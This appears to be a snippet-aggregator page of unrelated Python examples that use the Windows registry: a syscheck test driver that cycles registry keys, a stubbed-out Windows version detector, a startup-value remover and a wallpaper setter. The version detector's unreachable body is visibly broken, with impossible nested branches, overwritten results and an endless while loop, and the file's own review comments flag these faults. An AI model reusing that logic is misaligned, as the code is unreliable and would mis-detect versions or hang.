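        ptype = _win32_getvalue(keyCurVer, 'CurrentType', (ptype, 1))[0]
        version = _norm_version(version, build)
    finally:
        RegCloseKey(keyCurVer)
    return (release, version, csd, ptype)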
def configure_syscheck_environment(time_sleep):
    """Drive a registry add / modify / delete cycle for the syscheck scans.

    Test keys are created, the service is restarted, and then values are
    added, changed (together with key permissions and owner) and finally
    deleted.  After each phase the clock is moved 13 hours ahead and the
    function waits for a scan to complete.

    Args:
        time_sleep: seconds to pause so that `generate_windows_yaml.py`
            can be started by hand.
    """
    reg_key = 'reg_key'
    reg_value = 'value_name'

    def advance_and_wait():
        """Jump 13 hours ahead and give the next scan time to finish."""
        TimeMachine.travel_to_future(timedelta(hours=13))
        logger.debug(f'Waiting {SCAN_WAIT} seconds for scan to finish.')
        time.sleep(SCAN_WAIT)

    # Create every needed directory
    for index in range(n_windows_registry):
        t_dir = f'{testreg}{index}'
        create_registry(registry_parser[KEY], t_dir, KEY_WOW64_64KEY)
        reg_list.append(t_dir)

    control_service('restart')
    logger.debug('Waiting 15 seconds for syscheckd to start.')
    time.sleep(15)

    logger.debug(
        f'Waiting {time_sleep!s} seconds. Execute `generate_windows_yaml.py` now.'
    )
    time.sleep(time_sleep)

    # NOTE(review): the message announces SCAN_WAIT seconds but the sleep is
    # a fixed 120; confirm which of the two is intended.
    logger.debug(f'Waiting {SCAN_WAIT} seconds for baseline scan to finish.')
    time.sleep(120)

    logger.debug('Creating registries...')
    for registry in reg_list:
        added_key = create_registry(registry_parser[KEY],
                                    os.path.join(registry, reg_key),
                                    KEY_WOW64_64KEY)
        modify_registry_value(added_key, reg_value, REG_SZ, 'added')

    advance_and_wait()

    logger.debug('Modifying registries...')
    for registry in reg_list:
        target = os.path.join(registry, reg_key)
        # Permissions and owner are both set to the logged-in account.
        modify_key_perms(
            registry_parser[KEY], target, KEY_WOW64_64KEY,
            LookupAccountName(None, f"{platform.node()}\\{os.getlogin()}")[0])
        modify_registry_owner(
            registry_parser[KEY], target, KEY_WOW64_64KEY,
            LookupAccountName(None, f"{platform.node()}\\{os.getlogin()}")[0])
        changed_key = RegOpenKeyEx(registry_parser[KEY], target, 0,
                                   KEY_ALL_ACCESS | KEY_WOW64_64KEY)
        modify_registry_value(changed_key, reg_value, REG_SZ, 'modified')

    advance_and_wait()

    logger.debug('Deleting registries...')
    for registry in reg_list:
        delete_registry(registry_parser[KEY], os.path.join(registry, reg_key),
                        KEY_WOW64_64KEY)

    advance_and_wait()
Esempio n. 22
def win32_ver(release='', version='', csd='', ptype=''):
    """Report Windows version details as ``(release, version, csd, ptype)``.

    NOTE(review): the first statement returns ``('Unknown', '', '', '')``
    unconditionally, so every line after it is unreachable and the four
    parameters are never read. The remainder is kept as found; the comments
    below describe what it would do if the stub return were removed, and
    flag the places that would need attention before re-enabling it.
    """
    # Stub: callers always receive this tuple.
    return ('Unknown', '', '', '')
    # ---- everything below is unreachable because of the return above ----
    # Prefer pywin32; otherwise fall back to sys.getwindowsversion + winreg.
    try:
        import win32api
        from win32api import RegQueryValueEx, RegOpenKeyEx, RegCloseKey, GetVersionEx
        from win32con import HKEY_LOCAL_MACHINE, VER_PLATFORM_WIN32_NT, VER_PLATFORM_WIN32_WINDOWS, VER_NT_WORKSTATION
    except ImportError:
        try:
            sys.getwindowsversion
        except AttributeError:
            # No Windows version API at all: hand back the caller's defaults.
            return (release, version, csd, ptype)
        import winreg
        GetVersionEx = sys.getwindowsversion
        RegQueryValueEx = winreg.QueryValueEx
        RegOpenKeyEx = winreg.OpenKeyEx
        RegCloseKey = winreg.CloseKey
        HKEY_LOCAL_MACHINE = winreg.HKEY_LOCAL_MACHINE
        VER_PLATFORM_WIN32_WINDOWS = 1
        VER_PLATFORM_WIN32_NT = 2
        VER_NT_WORKSTATION = 1
        # VER_NT_SERVER and REG_SZ are assigned only on this fallback path;
        # the pywin32 imports above do not bring them in, so the ProductName
        # lookups below would find them unbound on the pywin32 path.
        VER_NT_SERVER = 3
        REG_SZ = 1
    winver = GetVersionEx()
    # `min` shadows the builtin for the rest of the function.
    (maj, min, buildno, plat, csd) = winver
    # Only the low 16 bits of the build number are kept.
    version = '%i.%i.%i' % (maj, min, buildno & 65535)
    # Normalise the service-pack string to the short "SP<n>" form.
    if hasattr(winver, 'service_pack'):
        if winver.service_pack != '':
            csd = 'SP%s' % winver.service_pack_major
    elif csd[:13] == 'Service Pack ':
        csd = 'SP' + csd[13:]
    if plat == VER_PLATFORM_WIN32_WINDOWS:
        regkey = 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion'
        if maj == 4:
            if min == 0:
                release = '95'
            elif min == 10:
                release = '98'
            elif min == 90:
                release = 'Me'
            else:
                release = 'postMe'
                # Cannot be true: this branch is only entered when maj == 4.
                if maj == 5:
                    release = '2000'
        elif maj == 5:
            release = '2000'
    elif plat == VER_PLATFORM_WIN32_NT:
        regkey = 'SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion'
        if maj <= 4:
            release = 'NT'
        elif maj == 5:
            if min == 0:
                release = '2000'
            elif min == 1:
                release = 'XP'
            elif min == 2:
                release = '2003Server'
            else:
                release = 'post2003'
                # Cannot be true inside the maj == 5 branch, so this whole
                # nested block never runs; the maj == 6 handling that can
                # run is the `elif maj == 6` further down.
                if maj == 6:
                    if hasattr(winver, 'product_type'):
                        product_type = winver.product_type
                    else:
                        product_type = VER_NT_WORKSTATION
                        try:
                            key = RegOpenKeyEx(HKEY_LOCAL_MACHINE, regkey)
                            (name, type) = RegQueryValueEx(key, 'ProductName')
                            while type == REG_SZ and name.find('Server') != -1:
                                product_type = VER_NT_SERVER
                        except WindowsError:
                            pass
                    if min == 0:
                        if product_type == VER_NT_WORKSTATION:
                            release = 'Vista'
                        else:
                            release = '2008Server'
                            if min == 1:
                                if product_type == VER_NT_WORKSTATION:
                                    release = '7'
                                else:
                                    release = '2008ServerR2'
                                    if min == 2:
                                        if product_type == VER_NT_WORKSTATION:
                                            release = '8'
                                        else:
                                            release = '2012Server'
                                            release = 'post2012Server'
                                    else:
                                        release = 'post2012Server'
                            elif min == 2:
                                if product_type == VER_NT_WORKSTATION:
                                    release = '8'
                                else:
                                    release = '2012Server'
                                    release = 'post2012Server'
                            else:
                                release = 'post2012Server'
                    elif min == 1:
                        if product_type == VER_NT_WORKSTATION:
                            release = '7'
                        else:
                            release = '2008ServerR2'
                            if min == 2:
                                if product_type == VER_NT_WORKSTATION:
                                    release = '8'
                                else:
                                    release = '2012Server'
                                    release = 'post2012Server'
                            else:
                                release = 'post2012Server'
                    elif min == 2:
                        if product_type == VER_NT_WORKSTATION:
                            release = '8'
                        else:
                            release = '2012Server'
                            release = 'post2012Server'
                    else:
                        release = 'post2012Server'
        elif maj == 6:
            # Workstation vs. server: use the version structure when it has
            # product_type, otherwise look at ProductName in the registry.
            if hasattr(winver, 'product_type'):
                product_type = winver.product_type
            else:
                product_type = VER_NT_WORKSTATION
                try:
                    # NOTE(review): `key` is never closed on this path, and
                    # `type` shadows the builtin.
                    key = RegOpenKeyEx(HKEY_LOCAL_MACHINE, regkey)
                    (name, type) = RegQueryValueEx(key, 'ProductName')
                    # NOTE(review): the loop body does not change the
                    # condition, so this would spin forever whenever the
                    # condition holds; it reads like an `if` -- confirm
                    # against the upstream source before re-enabling.
                    while type == REG_SZ and name.find('Server') != -1:
                        product_type = VER_NT_SERVER
                except WindowsError:
                    pass
            if min == 0:
                if product_type == VER_NT_WORKSTATION:
                    release = 'Vista'
                else:
                    release = '2008Server'
                    # The nested `min` tests below sit inside the min == 0
                    # branch, so none of them can be true.
                    if min == 1:
                        if product_type == VER_NT_WORKSTATION:
                            release = '7'
                        else:
                            release = '2008ServerR2'
                            if min == 2:
                                if product_type == VER_NT_WORKSTATION:
                                    release = '8'
                                else:
                                    release = '2012Server'
                                    release = 'post2012Server'
                            else:
                                release = 'post2012Server'
                    elif min == 2:
                        if product_type == VER_NT_WORKSTATION:
                            release = '8'
                        else:
                            release = '2012Server'
                            release = 'post2012Server'
                    else:
                        # Taken for every server with min == 0, so the
                        # '2008Server' assignment above is overwritten.
                        release = 'post2012Server'
            elif min == 1:
                if product_type == VER_NT_WORKSTATION:
                    release = '7'
                else:
                    release = '2008ServerR2'
                    if min == 2:
                        if product_type == VER_NT_WORKSTATION:
                            release = '8'
                        else:
                            release = '2012Server'
                            release = 'post2012Server'
                    else:
                        # Same pattern: '2008ServerR2' is overwritten here.
                        release = 'post2012Server'
            elif min == 2:
                if product_type == VER_NT_WORKSTATION:
                    release = '8'
                else:
                    # The first assignment is overwritten by the next line.
                    release = '2012Server'
                    release = 'post2012Server'
            else:
                release = 'post2012Server'
    else:
        # Unrecognised platform id: fall back to "major.minor" when the
        # caller supplied no release string.
        if not release:
            release = '%i.%i' % (maj, min)
        return (release, version, csd, ptype)
    try:
        keyCurVer = RegOpenKeyEx(HKEY_LOCAL_MACHINE, regkey)
        # The value read here is discarded; presumably a probe that the key
        # is readable -- confirm.
        RegQueryValueEx(keyCurVer, 'SystemRoot')
    except:
        # NOTE(review): the bare except hides every failure, including
        # access-denied, and leaves keyCurVer open if only the query failed.
        return (release, version, csd, ptype)
    # _win32_getvalue and _norm_version are defined elsewhere in the file.
    build = _win32_getvalue(keyCurVer, 'CurrentBuildNumber', ('', 1))[0]
    ptype = _win32_getvalue(keyCurVer, 'CurrentType', (ptype, 1))[0]
    version = _norm_version(version, build)
    # The handle is closed only on this normal path.
    RegCloseKey(keyCurVer)
    return (release, version, csd, ptype)
Esempio n. 23
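def run_at_startup_remove(app_name):
    """Delete the value named *app_name* from ``SUBKEY`` under HKEY_LOCAL_MACHINE.

    ``SUBKEY`` is defined elsewhere in the file; going by the function name
    it is presumably the machine-wide startup ("Run") key -- confirm there.
    The key is opened with ``KEY_WRITE`` only, which is all the deletion
    needs. Writing under HKEY_LOCAL_MACHINE normally requires an elevated
    process.

    Any error raised by the registry calls (for example when the value does
    not exist or access is denied) propagates to the caller. Autostart
    entries are commonly audited, so a caller may want to log which value
    it removed.
    """
    key = RegOpenKeyEx(HKEY_LOCAL_MACHINE, SUBKEY, 0, KEY_WRITE)
    try:
        RegDeleteValue(key, app_name)
    finally:
        # Release the handle even when the delete fails.
        RegCloseKey(key)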
Esempio n. 24
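def set_wall():
    """Set the current user's desktop wallpaper to the bundled image.

    Writes ``WallpaperStyle`` = '2' and ``TileWallpaper`` = '0' under
    ``HKEY_CURRENT_USER\\Control Panel\\Desktop``, then asks Windows to
    apply ``image/wall.jpg`` from the directory containing this file. Only
    the current user's hive is touched and the key is opened with
    ``KEY_SET_VALUE`` only.

    Errors from the registry or SystemParametersInfo calls propagate to the
    caller; the key handle is released either way.
    """
    key = RegOpenKeyEx(HKEY_CURRENT_USER, "Control Panel\\Desktop", 0, KEY_SET_VALUE)
    try:
        RegSetValueEx(key, 'WallpaperStyle', 0, REG_SZ, '2')
        RegSetValueEx(key, 'TileWallpaper', 0, REG_SZ, '0')
        # 1 + 2 is SPIF_UPDATEINIFILE | SPIF_SENDWININICHANGE: persist the
        # setting in the user profile and broadcast the change.
        SystemParametersInfo(SPI_SETDESKWALLPAPER, dirname(__file__)+'/image/wall.jpg', 1+2)
    finally:
        # Close the handle even if one of the calls above raises.
        RegCloseKey(key)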